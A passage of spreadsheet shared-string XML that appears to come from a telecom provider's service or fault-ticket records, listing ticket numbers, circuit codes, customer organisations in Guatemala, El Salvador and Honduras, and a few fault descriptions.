  </si>
  <si>
    <t>F4549377</t>
  </si>
  <si>
    <t>595100001T</t>
  </si>
  <si>
    <t>CLAUDIA ELIZABETH ARRIOLA REYNOSA DE GARCIA</t>
  </si>
  <si>
    <t>744100001T</t>
  </si>
  <si>
    <t>F4549387</t>
  </si>
  <si>
    <t>F4549395</t>
  </si>
  <si>
    <t>22261062SV</t>
  </si>
  <si>
    <t>VETERINARIA LOS HEROES , S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4549405</t>
  </si>
  <si>
    <t>22463760SV</t>
  </si>
  <si>
    <t>ORPROSAL S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4549408</t>
  </si>
  <si>
    <t>927700012T</t>
  </si>
  <si>
    <t>ID1041089SV</t>
  </si>
  <si>
    <t>DISEÑOS DE ESPUMA SALVADORE¥O S.A. DE C.V.</t>
  </si>
  <si>
    <t>ID1145179SV</t>
  </si>
  <si>
    <t>F4549435</t>
  </si>
  <si>
    <t>FEDERACION NACIONAL DE COOPERATIVAS DE AHORRO Y CREDITO Y SERVS VARIOS RL...</t>
  </si>
  <si>
    <t>F4549464</t>
  </si>
  <si>
    <t>942400001T</t>
  </si>
  <si>
    <t>INTEC</t>
  </si>
  <si>
    <t>F4549468</t>
  </si>
  <si>
    <t>F4549470</t>
  </si>
  <si>
    <t>549800001T</t>
  </si>
  <si>
    <t>ASOCIACION CULTURAL Y SOCIO BENEFICA DE LOS HERMANOS MARISTAS DE GUATE</t>
  </si>
  <si>
    <t>481500001T</t>
  </si>
  <si>
    <t>503300001T</t>
  </si>
  <si>
    <t>F4549485</t>
  </si>
  <si>
    <t>25942100SV</t>
  </si>
  <si>
    <t>F4556649</t>
  </si>
  <si>
    <t>ID1129061SV</t>
  </si>
  <si>
    <t>MINISTERIO DE EDUCACION, CIENCIA Y TECNOLOGÍA</t>
  </si>
  <si>
    <t>665060OH</t>
  </si>
  <si>
    <t>ID1164016SV</t>
  </si>
  <si>
    <t>INVERSIONES TEXTILES S.A.DE CV</t>
  </si>
  <si>
    <t>F4556672</t>
  </si>
  <si>
    <t>F4556680</t>
  </si>
  <si>
    <t>F4556690</t>
  </si>
  <si>
    <t>1545473</t>
  </si>
  <si>
    <t>451945ON</t>
  </si>
  <si>
    <t>F4556708</t>
  </si>
  <si>
    <t>F4556709</t>
  </si>
  <si>
    <t>F4556714</t>
  </si>
  <si>
    <t>F4556715</t>
  </si>
  <si>
    <t>90001910101T</t>
  </si>
  <si>
    <t>F4556716</t>
  </si>
  <si>
    <t>245700205T</t>
  </si>
  <si>
    <t>ID1126047SV</t>
  </si>
  <si>
    <t>PROYECTO LA TRINIDAD, LIMITADA DE CAPITAL VARIABLE</t>
  </si>
  <si>
    <t>910400115T</t>
  </si>
  <si>
    <t>F4556725</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_PTO_SAN_JOSE</t>
  </si>
  <si>
    <t>F4556729</t>
  </si>
  <si>
    <t>F4556733</t>
  </si>
  <si>
    <t>910400030T</t>
  </si>
  <si>
    <t>F4556753</t>
  </si>
  <si>
    <t>F4556754</t>
  </si>
  <si>
    <t>519073ON</t>
  </si>
  <si>
    <t>758500453T</t>
  </si>
  <si>
    <t>F4556765</t>
  </si>
  <si>
    <t>616514OH</t>
  </si>
  <si>
    <t>OH1000513206/EMPRESA DIECK Y DIECK  -</t>
  </si>
  <si>
    <t>F4556768</t>
  </si>
  <si>
    <t>F4556770</t>
  </si>
  <si>
    <t>907800001T</t>
  </si>
  <si>
    <t>IGSS HOSPITAL CHIMALTENANGO</t>
  </si>
  <si>
    <t>ID1037159SV</t>
  </si>
  <si>
    <t>F4556794</t>
  </si>
  <si>
    <t>F4601958</t>
  </si>
  <si>
    <t>DX - MASIVO</t>
  </si>
  <si>
    <t>CLARO RED</t>
  </si>
  <si>
    <t>F4602008</t>
  </si>
  <si>
    <t>F4602011</t>
  </si>
  <si>
    <t>F4602012</t>
  </si>
  <si>
    <t>47504043T</t>
  </si>
  <si>
    <t>F4602022</t>
  </si>
  <si>
    <t>F4602023</t>
  </si>
  <si>
    <t>441300056T</t>
  </si>
  <si>
    <t>F4602072</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0089</t>
  </si>
  <si>
    <t>F4602088</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_TIQUISATE_ESC</t>
  </si>
  <si>
    <t>F4563071</t>
  </si>
  <si>
    <t>F4563072</t>
  </si>
  <si>
    <t>F4563085</t>
  </si>
  <si>
    <t>F4563102</t>
  </si>
  <si>
    <t>F4563113</t>
  </si>
  <si>
    <t>F4563117</t>
  </si>
  <si>
    <t>F4563126</t>
  </si>
  <si>
    <t>F4563135</t>
  </si>
  <si>
    <t>F4563147</t>
  </si>
  <si>
    <t>F4563149</t>
  </si>
  <si>
    <t>F4563167</t>
  </si>
  <si>
    <t>ID1024164SV</t>
  </si>
  <si>
    <t>ASOC.COOP.DE AHORRO Y CRED. SIHUATEHUACAN</t>
  </si>
  <si>
    <t>F4563173</t>
  </si>
  <si>
    <t>F4563177</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0075</t>
  </si>
  <si>
    <t>F4563184</t>
  </si>
  <si>
    <t>F4563187</t>
  </si>
  <si>
    <t>F4563194</t>
  </si>
  <si>
    <t>F4563195</t>
  </si>
  <si>
    <t>F4563198</t>
  </si>
  <si>
    <t>F4563199</t>
  </si>
  <si>
    <t>F4563201</t>
  </si>
  <si>
    <t>7300100T</t>
  </si>
  <si>
    <t>490000001T</t>
  </si>
  <si>
    <t>MAYOREO CANDELARIA</t>
  </si>
  <si>
    <t>646900001T</t>
  </si>
  <si>
    <t>ARRENDAMIENTO CEGALSA</t>
  </si>
  <si>
    <t>F4614373</t>
  </si>
  <si>
    <t>1657979OH</t>
  </si>
  <si>
    <t>773600001T</t>
  </si>
  <si>
    <t>POLYSCAN</t>
  </si>
  <si>
    <t>F4614383</t>
  </si>
  <si>
    <t>CC_GYT_GT_CERVECERIA</t>
  </si>
  <si>
    <t>F4614384</t>
  </si>
  <si>
    <t>48000029T</t>
  </si>
  <si>
    <t>650900001T</t>
  </si>
  <si>
    <t>AUTOGALERIAS EXEL AUTOMOTRIZ (BMW)</t>
  </si>
  <si>
    <t>664700005T</t>
  </si>
  <si>
    <t>664700008T</t>
  </si>
  <si>
    <t>369100001T</t>
  </si>
  <si>
    <t>FERRETERIA EL GLOBO, S.A.</t>
  </si>
  <si>
    <t>248700006T</t>
  </si>
  <si>
    <t>514300005T</t>
  </si>
  <si>
    <t>F4614498</t>
  </si>
  <si>
    <t>F4614506</t>
  </si>
  <si>
    <t>237400259T</t>
  </si>
  <si>
    <t>F4547769</t>
  </si>
  <si>
    <t>939826OH</t>
  </si>
  <si>
    <t>F4547783</t>
  </si>
  <si>
    <t>F4547785</t>
  </si>
  <si>
    <t>F4547799</t>
  </si>
  <si>
    <t>F4547807</t>
  </si>
  <si>
    <t>F4547819</t>
  </si>
  <si>
    <t>IP2205003SV</t>
  </si>
  <si>
    <t>F4547821</t>
  </si>
  <si>
    <t>F4547825</t>
  </si>
  <si>
    <t>23490900SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE ZARAGOZA</t>
  </si>
  <si>
    <t>F4547828</t>
  </si>
  <si>
    <t>535300001T</t>
  </si>
  <si>
    <t>TEXTILES CANTON S.A.</t>
  </si>
  <si>
    <t>90001905633T</t>
  </si>
  <si>
    <t>F4547857</t>
  </si>
  <si>
    <t>F4547858</t>
  </si>
  <si>
    <t>F4547859</t>
  </si>
  <si>
    <t>F4547862</t>
  </si>
  <si>
    <t>F4547885</t>
  </si>
  <si>
    <t>22254366SV</t>
  </si>
  <si>
    <t>ASOCIACION ALDEAS INFANTILES SOS DE EL SALVADOR</t>
  </si>
  <si>
    <t>F4547906</t>
  </si>
  <si>
    <t>F4578914</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2992</t>
  </si>
  <si>
    <t>F4578960</t>
  </si>
  <si>
    <t>38300487T</t>
  </si>
  <si>
    <t>CC_WALMART_GT_INTERNET_MAZATENANGO</t>
  </si>
  <si>
    <t>478800022T</t>
  </si>
  <si>
    <t>F4619677</t>
  </si>
  <si>
    <t>ID1105037SV</t>
  </si>
  <si>
    <t>LA CANTERA S.A DE C.V</t>
  </si>
  <si>
    <t>ID1405003SV</t>
  </si>
  <si>
    <t>478800016T</t>
  </si>
  <si>
    <t>478800017T</t>
  </si>
  <si>
    <t>F4619730</t>
  </si>
  <si>
    <t>381600002T</t>
  </si>
  <si>
    <t>PIER 17 DE GUATEMALA</t>
  </si>
  <si>
    <t>F4619738</t>
  </si>
  <si>
    <t>F4619743</t>
  </si>
  <si>
    <t>EN PROCESO DE BAJA</t>
  </si>
  <si>
    <t>912969OH</t>
  </si>
  <si>
    <t>OH1000749560/COMERRSA HONDURAS S R L -</t>
  </si>
  <si>
    <t>90001908044T</t>
  </si>
  <si>
    <t>F4619761</t>
  </si>
  <si>
    <t>F4619767</t>
  </si>
  <si>
    <t>F4619774</t>
  </si>
  <si>
    <t>673000007T</t>
  </si>
  <si>
    <t>IP2128002SV</t>
  </si>
  <si>
    <t>CAJA DE CREDITO NUEVA CONCEPCION</t>
  </si>
  <si>
    <t>53700015T</t>
  </si>
  <si>
    <t>F4581394</t>
  </si>
  <si>
    <t>F4581399</t>
  </si>
  <si>
    <t>562700002T</t>
  </si>
  <si>
    <t>TIENDAS ORIENTE, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4581406</t>
  </si>
  <si>
    <t>F4581427</t>
  </si>
  <si>
    <t>F4581428</t>
  </si>
  <si>
    <t>F4581430</t>
  </si>
  <si>
    <t>F4581432</t>
  </si>
  <si>
    <t>1108766OH</t>
  </si>
  <si>
    <t>F4581446</t>
  </si>
  <si>
    <t>596700002T</t>
  </si>
  <si>
    <t>F4581458</t>
  </si>
  <si>
    <t>F4581460</t>
  </si>
  <si>
    <t>F4581463</t>
  </si>
  <si>
    <t>F4581464</t>
  </si>
  <si>
    <t>5373669ON</t>
  </si>
  <si>
    <t>ON0002899314</t>
  </si>
  <si>
    <t>770600219T</t>
  </si>
  <si>
    <t>F4581481</t>
  </si>
  <si>
    <t>F4581483</t>
  </si>
  <si>
    <t>F4581490</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T48</t>
  </si>
  <si>
    <t>770600094T</t>
  </si>
  <si>
    <t>940000002T</t>
  </si>
  <si>
    <t>AAK'USAL NETWORKS</t>
  </si>
  <si>
    <t>90001906779T</t>
  </si>
  <si>
    <t>F4581502</t>
  </si>
  <si>
    <t>90001908618T</t>
  </si>
  <si>
    <t>F4581507</t>
  </si>
  <si>
    <t>F4581508</t>
  </si>
  <si>
    <t>349900350T</t>
  </si>
  <si>
    <t>F4581516</t>
  </si>
  <si>
    <t>38300700T</t>
  </si>
  <si>
    <t>1729792OH</t>
  </si>
  <si>
    <t>F4581525</t>
  </si>
  <si>
    <t>IP2379002SV</t>
  </si>
  <si>
    <t>449570ON</t>
  </si>
  <si>
    <t>F4549526</t>
  </si>
  <si>
    <t>F4549527</t>
  </si>
  <si>
    <t>F4549529</t>
  </si>
  <si>
    <t>F4549530</t>
  </si>
  <si>
    <t>FCN006H</t>
  </si>
  <si>
    <t>99900409T</t>
  </si>
  <si>
    <t>F4549535</t>
  </si>
  <si>
    <t>F4549537</t>
  </si>
  <si>
    <t>F4549550</t>
  </si>
  <si>
    <t>59700063T</t>
  </si>
  <si>
    <t>F4549553</t>
  </si>
  <si>
    <t>F4549559</t>
  </si>
  <si>
    <t>F4549564</t>
  </si>
  <si>
    <t>F4549567</t>
  </si>
  <si>
    <t>F4549590</t>
  </si>
  <si>
    <t>F4549598</t>
  </si>
  <si>
    <t>625900104T</t>
  </si>
  <si>
    <t>F4549622</t>
  </si>
  <si>
    <t>F4549641</t>
  </si>
  <si>
    <t>F4549649</t>
  </si>
  <si>
    <t>F4549652</t>
  </si>
  <si>
    <t>F4549653</t>
  </si>
  <si>
    <t>344400635T</t>
  </si>
  <si>
    <t>F4549668</t>
  </si>
  <si>
    <t>90001908185T</t>
  </si>
  <si>
    <t>927700015T</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_PARAISO_1</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_MELCHOR_MENCOS_040</t>
  </si>
  <si>
    <t>619700004T</t>
  </si>
  <si>
    <t>F4556819</t>
  </si>
  <si>
    <t>3614596ON</t>
  </si>
  <si>
    <t>910800005T</t>
  </si>
  <si>
    <t>F4556824</t>
  </si>
  <si>
    <t>F4556828</t>
  </si>
  <si>
    <t>F4556830</t>
  </si>
  <si>
    <t>321700007T</t>
  </si>
  <si>
    <t>C SITE TEXPIA S.A.</t>
  </si>
  <si>
    <t>F4556832</t>
  </si>
  <si>
    <t>ID1112057SV</t>
  </si>
  <si>
    <t>3892807ON</t>
  </si>
  <si>
    <t>F4556835</t>
  </si>
  <si>
    <t>F4556842</t>
  </si>
  <si>
    <t>204000004T</t>
  </si>
  <si>
    <t>WO &amp; PUBLICIDAD, S.A.</t>
  </si>
  <si>
    <t>F4556846</t>
  </si>
  <si>
    <t>803700006T</t>
  </si>
  <si>
    <t>973216OH</t>
  </si>
  <si>
    <t>887200001T</t>
  </si>
  <si>
    <t>GLB CONTACT CENTER, S.A.</t>
  </si>
  <si>
    <t>F4556867</t>
  </si>
  <si>
    <t>IP2124164SV</t>
  </si>
  <si>
    <t>F4556877</t>
  </si>
  <si>
    <t>F4556878</t>
  </si>
  <si>
    <t>F4556882</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0089</t>
  </si>
  <si>
    <t>F4556883</t>
  </si>
  <si>
    <t>880000002T</t>
  </si>
  <si>
    <t>ASOCIACION GUATEMALTECA DE DESARROLLO FAMILIAR</t>
  </si>
  <si>
    <t>F4556892</t>
  </si>
  <si>
    <t>F4556894</t>
  </si>
  <si>
    <t>90001910645T</t>
  </si>
  <si>
    <t>946700001T</t>
  </si>
  <si>
    <t>FEDERACION NACIONAL DE COOPERATIVAS DE AHORRO Y CREDITO Y SERVS VARIOS</t>
  </si>
  <si>
    <t>90001903624T</t>
  </si>
  <si>
    <t>23103902SV</t>
  </si>
  <si>
    <t>FUNDACION DE DESARROLLO SOCIAL</t>
  </si>
  <si>
    <t>551500009T</t>
  </si>
  <si>
    <t>483200001T</t>
  </si>
  <si>
    <t>F4556932</t>
  </si>
  <si>
    <t>F4556934</t>
  </si>
  <si>
    <t>F4556935</t>
  </si>
  <si>
    <t>F4556938</t>
  </si>
  <si>
    <t>F4556944</t>
  </si>
  <si>
    <t>F4556946</t>
  </si>
  <si>
    <t>521200007T</t>
  </si>
  <si>
    <t>F4602780</t>
  </si>
  <si>
    <t>ID1031141SV</t>
  </si>
  <si>
    <t>1744591OH</t>
  </si>
  <si>
    <t>OH1001082971</t>
  </si>
  <si>
    <t>427100031T</t>
  </si>
  <si>
    <t>397200029T</t>
  </si>
  <si>
    <t>863100001T</t>
  </si>
  <si>
    <t>MEDICINA Y RADIOLOGIA ESPECIALIZADA, S.A.</t>
  </si>
  <si>
    <t>F4602822</t>
  </si>
  <si>
    <t>400000090T</t>
  </si>
  <si>
    <t>1730455OH</t>
  </si>
  <si>
    <t>OH1000849968</t>
  </si>
  <si>
    <t>F4602855</t>
  </si>
  <si>
    <t>8901213T</t>
  </si>
  <si>
    <t>F4602866</t>
  </si>
  <si>
    <t>769500003T</t>
  </si>
  <si>
    <t>F4602872</t>
  </si>
  <si>
    <t>769600001T</t>
  </si>
  <si>
    <t>PACER INTERNATIONAL CORPORATION GT, S.A.</t>
  </si>
  <si>
    <t>769600002T</t>
  </si>
  <si>
    <t>F4602892</t>
  </si>
  <si>
    <t>F4602905</t>
  </si>
  <si>
    <t>F4602908</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_POPTUN</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SANTA_CATARINA_PINULA</t>
  </si>
  <si>
    <t>F4602922</t>
  </si>
  <si>
    <t>F4602923</t>
  </si>
  <si>
    <t>601500001T</t>
  </si>
  <si>
    <t>ASOCIACION MEDICA DE ORIENTE, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4566144</t>
  </si>
  <si>
    <t>38300607T</t>
  </si>
  <si>
    <t>ID1063016SV</t>
  </si>
  <si>
    <t>F4566152</t>
  </si>
  <si>
    <t>22416200SV</t>
  </si>
  <si>
    <t>C.IMBERTON S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4566154</t>
  </si>
  <si>
    <t>526400016T</t>
  </si>
  <si>
    <t>F4566160</t>
  </si>
  <si>
    <t>F4566166</t>
  </si>
  <si>
    <t>F4566173</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C113</t>
  </si>
  <si>
    <t>IDG002436SV</t>
  </si>
  <si>
    <t>23972200SV</t>
  </si>
  <si>
    <t>CENTRO NACIONAL DE TECNOLOGIA AGROPECUARIA Y FORESTAL</t>
  </si>
  <si>
    <t>493500001T</t>
  </si>
  <si>
    <t>INSIVUMEH</t>
  </si>
  <si>
    <t>8200141T</t>
  </si>
  <si>
    <t>F4566186</t>
  </si>
  <si>
    <t>564000005T</t>
  </si>
  <si>
    <t>HMM DE GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4566202</t>
  </si>
  <si>
    <t>F4566208</t>
  </si>
  <si>
    <t>331800063T</t>
  </si>
  <si>
    <t>F4566215</t>
  </si>
  <si>
    <t>F4566221</t>
  </si>
  <si>
    <t>F4566225</t>
  </si>
  <si>
    <t>38300495T</t>
  </si>
  <si>
    <t>F4566235</t>
  </si>
  <si>
    <t>425500049T</t>
  </si>
  <si>
    <t>559800005T</t>
  </si>
  <si>
    <t>673000011T</t>
  </si>
  <si>
    <t>90001907936T</t>
  </si>
  <si>
    <t>362000005T</t>
  </si>
  <si>
    <t>F4566254</t>
  </si>
  <si>
    <t>1539667OH</t>
  </si>
  <si>
    <t>863400072T</t>
  </si>
  <si>
    <t>90001908821T</t>
  </si>
  <si>
    <t>F4566265</t>
  </si>
  <si>
    <t>F4566268</t>
  </si>
  <si>
    <t>305300002T</t>
  </si>
  <si>
    <t>MACROPLAST S.A.</t>
  </si>
  <si>
    <t>340500051T</t>
  </si>
  <si>
    <t>340500055T</t>
  </si>
  <si>
    <t>F4566286</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_EL_BOSQUE</t>
  </si>
  <si>
    <t>480000001T</t>
  </si>
  <si>
    <t>UNIDAD DE DIAGNOSTICO CARDIOLOGICO S.A.</t>
  </si>
  <si>
    <t>F4623031</t>
  </si>
  <si>
    <t>22054790SV</t>
  </si>
  <si>
    <t>ELITE TECHNOLOGIES SA DE CV</t>
  </si>
  <si>
    <t>26510440</t>
  </si>
  <si>
    <t>ACACCESPRO DE R.L</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3787</t>
  </si>
  <si>
    <t>SIN PROTECCION UPS</t>
  </si>
  <si>
    <t>829800004T</t>
  </si>
  <si>
    <t>F4623088</t>
  </si>
  <si>
    <t>DID SIN ACCESO</t>
  </si>
  <si>
    <t>90001902971T</t>
  </si>
  <si>
    <t>LENTITUD</t>
  </si>
  <si>
    <t>573800001T</t>
  </si>
  <si>
    <t>MARENOSTRUM, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4623101</t>
  </si>
  <si>
    <t>770600071T</t>
  </si>
  <si>
    <t>F4623111</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0162</t>
  </si>
  <si>
    <t>F4623118</t>
  </si>
  <si>
    <t>CC_BAM_GT_AGENCIA_246</t>
  </si>
  <si>
    <t>F4623119</t>
  </si>
  <si>
    <t>F4623121</t>
  </si>
  <si>
    <t>F4623125</t>
  </si>
  <si>
    <t>47504152T</t>
  </si>
  <si>
    <t>F4623136</t>
  </si>
  <si>
    <t>F4623138</t>
  </si>
  <si>
    <t>F4623144</t>
  </si>
  <si>
    <t>F4623153</t>
  </si>
  <si>
    <t>758500155T</t>
  </si>
  <si>
    <t>F4623169</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0070</t>
  </si>
  <si>
    <t>90001911083T</t>
  </si>
  <si>
    <t>487500001T</t>
  </si>
  <si>
    <t>LM 360 S.A.</t>
  </si>
  <si>
    <t>ID1027124SV</t>
  </si>
  <si>
    <t>HISPANOS SHIPPING SA DE CV</t>
  </si>
  <si>
    <t>317500061T</t>
  </si>
  <si>
    <t>F4549209</t>
  </si>
  <si>
    <t>341800220T</t>
  </si>
  <si>
    <t>777100001T</t>
  </si>
  <si>
    <t>ID1146005SV</t>
  </si>
  <si>
    <t>ADMINISTRADORA MICROREGIONAL DEL AGUA DEL VALLE LA ESPERANZA</t>
  </si>
  <si>
    <t>F4549223</t>
  </si>
  <si>
    <t>F4549225</t>
  </si>
  <si>
    <t>ID1168054SV</t>
  </si>
  <si>
    <t>PROYECTOS ALIMENTICIOS INTERNACIONALES S.A DE C.V</t>
  </si>
  <si>
    <t>F4549228</t>
  </si>
  <si>
    <t>630312OH</t>
  </si>
  <si>
    <t>F4549236</t>
  </si>
  <si>
    <t>F4549237</t>
  </si>
  <si>
    <t>612959OH</t>
  </si>
  <si>
    <t>F4549260</t>
  </si>
  <si>
    <t>F4549261</t>
  </si>
  <si>
    <t>F4549266</t>
  </si>
  <si>
    <t>ID1029364SV</t>
  </si>
  <si>
    <t>VACUNA SA DE CV</t>
  </si>
  <si>
    <t>F4549276</t>
  </si>
  <si>
    <t>F4549281</t>
  </si>
  <si>
    <t>F4549291</t>
  </si>
  <si>
    <t>F4549292</t>
  </si>
  <si>
    <t>F4549294</t>
  </si>
  <si>
    <t>317500015T</t>
  </si>
  <si>
    <t>F4549296</t>
  </si>
  <si>
    <t>F4549297</t>
  </si>
  <si>
    <t>F4549300</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_PRADERA_CHIQUIMULA</t>
  </si>
  <si>
    <t>25937000SV</t>
  </si>
  <si>
    <t>277800002T</t>
  </si>
  <si>
    <t>F4549309</t>
  </si>
  <si>
    <t>F4549311</t>
  </si>
  <si>
    <t>ID1099138SV</t>
  </si>
  <si>
    <t>EDUSSA S.A DE C.V.</t>
  </si>
  <si>
    <t>F4549315</t>
  </si>
  <si>
    <t>CC_WALMART_SV_DF_COJUTEPEQUE</t>
  </si>
  <si>
    <t>F4549323</t>
  </si>
  <si>
    <t>F4549331</t>
  </si>
  <si>
    <t>F4549332</t>
  </si>
  <si>
    <t>8901382T</t>
  </si>
  <si>
    <t>F4549336</t>
  </si>
  <si>
    <t>CONTR0001739819OC</t>
  </si>
  <si>
    <t>FLORIDA BEBIDAS S.A</t>
  </si>
  <si>
    <t>467331ON</t>
  </si>
  <si>
    <t>CONTR0001211527OC</t>
  </si>
  <si>
    <t>CONTR0001240249OC</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_130</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0744</t>
  </si>
  <si>
    <t>MP262113007SSV</t>
  </si>
  <si>
    <t>F4584187</t>
  </si>
  <si>
    <t>F4584191</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC007813</t>
  </si>
  <si>
    <t>F4584211</t>
  </si>
  <si>
    <t>F4584226</t>
  </si>
  <si>
    <t>F4584233</t>
  </si>
  <si>
    <t>F4584235</t>
  </si>
  <si>
    <t>815100001T</t>
  </si>
  <si>
    <t>WORLD CONNECTION, S.A.</t>
  </si>
  <si>
    <t>8902418T</t>
  </si>
  <si>
    <t>F4584255</t>
  </si>
  <si>
    <t>F4584257</t>
  </si>
  <si>
    <t>F4584260</t>
  </si>
  <si>
    <t>IP2136062SV</t>
  </si>
  <si>
    <t>349900079T</t>
  </si>
  <si>
    <t>CC_WALMART_SV_MAXIDESPENSA_SO</t>
  </si>
  <si>
    <t>F4619784</t>
  </si>
  <si>
    <t>349900434T</t>
  </si>
  <si>
    <t>F4619792</t>
  </si>
  <si>
    <t>672700017T</t>
  </si>
  <si>
    <t>F4619793</t>
  </si>
  <si>
    <t>22508800SV</t>
  </si>
  <si>
    <t>GUTICIA DE EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>357300016T</t>
  </si>
  <si>
    <t>584500001T</t>
  </si>
  <si>
    <t>LABORATORIO UNICOMER, S.A.</t>
  </si>
  <si>
    <t>F4619809</t>
  </si>
  <si>
    <t>758500110T</t>
  </si>
  <si>
    <t>F4619813</t>
  </si>
  <si>
    <t>245700139T</t>
  </si>
  <si>
    <t>725742OH</t>
  </si>
  <si>
    <t>OH1000642565/VERSATILE TECHNOLOGY DE HONDURAS S A VERSATEC -</t>
  </si>
  <si>
    <t>478343ON</t>
  </si>
  <si>
    <t>8902425T</t>
  </si>
  <si>
    <t>927700004T</t>
  </si>
  <si>
    <t>F4619834</t>
  </si>
  <si>
    <t>F4619836</t>
  </si>
  <si>
    <t>IP2165123SV</t>
  </si>
  <si>
    <t>948100001T</t>
  </si>
  <si>
    <t>WESTBOW GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4619844</t>
  </si>
  <si>
    <t>F4619846</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_539</t>
  </si>
  <si>
    <t>F4619847</t>
  </si>
  <si>
    <t>F4619858</t>
  </si>
  <si>
    <t>297400903T</t>
  </si>
  <si>
    <t>1657956OH</t>
  </si>
  <si>
    <t>F4619863</t>
  </si>
  <si>
    <t>F4619865</t>
  </si>
  <si>
    <t>F4619867</t>
  </si>
  <si>
    <t>F4619869</t>
  </si>
  <si>
    <t>F4619872</t>
  </si>
  <si>
    <t>950589OH</t>
  </si>
  <si>
    <t>OH1000772382/HCE HONDURAS SRL -</t>
  </si>
  <si>
    <t>450845ON</t>
  </si>
  <si>
    <t>29500077T</t>
  </si>
  <si>
    <t>F4619900</t>
  </si>
  <si>
    <t>90001910282T</t>
  </si>
  <si>
    <t>F4619907</t>
  </si>
  <si>
    <t>1463430OH</t>
  </si>
  <si>
    <t>DECOMA -</t>
  </si>
  <si>
    <t>F4619922</t>
  </si>
  <si>
    <t>F4619925</t>
  </si>
  <si>
    <t>451449ON</t>
  </si>
  <si>
    <t>608900001T</t>
  </si>
  <si>
    <t>ARISEGUROS, AGENCIA INDEPENDIENTE DE SEGUROS, S.A.</t>
  </si>
  <si>
    <t>1160265OH</t>
  </si>
  <si>
    <t>90001909860T</t>
  </si>
  <si>
    <t>F4583455</t>
  </si>
  <si>
    <t>1616394OH</t>
  </si>
  <si>
    <t>CABLE COLOR SA DE CV</t>
  </si>
  <si>
    <t>F4583475</t>
  </si>
  <si>
    <t>F4583486</t>
  </si>
  <si>
    <t>1234510OH</t>
  </si>
  <si>
    <t>ASI ASISTENCIA INTERNACIONAL</t>
  </si>
  <si>
    <t>F4583491</t>
  </si>
  <si>
    <t>F4583495</t>
  </si>
  <si>
    <t>F4583497</t>
  </si>
  <si>
    <t>F4583502</t>
  </si>
  <si>
    <t>IP2031314SV</t>
  </si>
  <si>
    <t>5209259ON</t>
  </si>
  <si>
    <t>CCN - PUNTO IDEAL LOMA LINDA</t>
  </si>
  <si>
    <t>5346644ON</t>
  </si>
  <si>
    <t>F4583542</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_JALAPA</t>
  </si>
  <si>
    <t>PROVEEDOR ENERGIA</t>
  </si>
  <si>
    <t>F4583547</t>
  </si>
  <si>
    <t>574100001T</t>
  </si>
  <si>
    <t>CORPORACION LIMA RIVERA, S.A.</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0095</t>
  </si>
  <si>
    <t>MP231101082SSV</t>
  </si>
  <si>
    <t>TELECOMUNICACIONES DE GUATEMALA</t>
  </si>
  <si>
    <t>1726763OH</t>
  </si>
  <si>
    <t>F4583569</t>
  </si>
  <si>
    <t>F4583576</t>
  </si>
  <si>
    <t>OH1000897729</t>
  </si>
  <si>
    <t>807900505T</t>
  </si>
  <si>
    <t>CONTR0001221108OC</t>
  </si>
  <si>
    <t>1167137OH</t>
  </si>
  <si>
    <t>HOME MEDICAL SUPPLIES S.A DE CV</t>
  </si>
  <si>
    <t>F4583601</t>
  </si>
  <si>
    <t>F4583609</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0365</t>
  </si>
  <si>
    <t>F4549869</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_INTERPLAZA_XELA_PC697</t>
  </si>
  <si>
    <t>F4549941</t>
  </si>
  <si>
    <t>F4549969</t>
  </si>
  <si>
    <t>F4549971</t>
  </si>
  <si>
    <t>F4549987</t>
  </si>
  <si>
    <t>F4561171</t>
  </si>
  <si>
    <t>526700001T</t>
  </si>
  <si>
    <t>GANO ITOUCH GUATEMALA S.A.</t>
  </si>
  <si>
    <t>921300001T</t>
  </si>
  <si>
    <t>CORPORACION MEDICO QUIRURGICA, S.A.</t>
  </si>
  <si>
    <t>F4561178</t>
  </si>
  <si>
    <t>ID1050077SV</t>
  </si>
  <si>
    <t>ID1028226SV</t>
  </si>
  <si>
    <t>MINISTERIO DE DEFENSA CETAC</t>
  </si>
  <si>
    <t>F4561189</t>
  </si>
  <si>
    <t>F4561190</t>
  </si>
  <si>
    <t>F4561197</t>
  </si>
  <si>
    <t>F4561203</t>
  </si>
  <si>
    <t>F4561204</t>
  </si>
  <si>
    <t>F4561207</t>
  </si>
  <si>
    <t>465300016T</t>
  </si>
  <si>
    <t>TECH TRADE S.A.</t>
  </si>
  <si>
    <t>473800028T</t>
  </si>
  <si>
    <t>ID1031210SV</t>
  </si>
  <si>
